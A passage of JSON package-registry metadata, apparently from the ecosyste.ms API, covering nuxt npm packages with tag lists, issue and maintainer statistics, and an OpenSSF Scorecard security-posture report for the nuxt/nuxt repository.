ste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.739Z","dependent_packages_count":5,"downloads":12375,"downloads_period":"last-month","dependent_repos_count":424,"rankings":{"downloads":1.065160170572752,"dependent_repos_count":0.8459715122247295,"dependent_packages_count":3.622902409528767,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":1.6186636805636194,"average":1.310756758547328},"purl":"pkg:npm/%40nuxt/webpack-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/webpack-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/webpack-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/webpack-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-edge/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-13T16:29:04.178Z","updated_at":"2023-12-13T16:29:04.178Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096102,"name":"@nuxt/generator-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1820,"first_release_published_at":"2018-10-24T17:00:55.108Z","latest_release_published_at":"2020-06-29T00:22:57.251Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-03-30T23:03:22.132Z","created_at":"2022-04-08T10:39:26.345Z","updated_at":"2026-03-30T23:03:22.133Z","registry_url":"https://www.npmjs.com/package/@nuxt/generator-edge","install_command":"npm install @nuxt/generator-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23: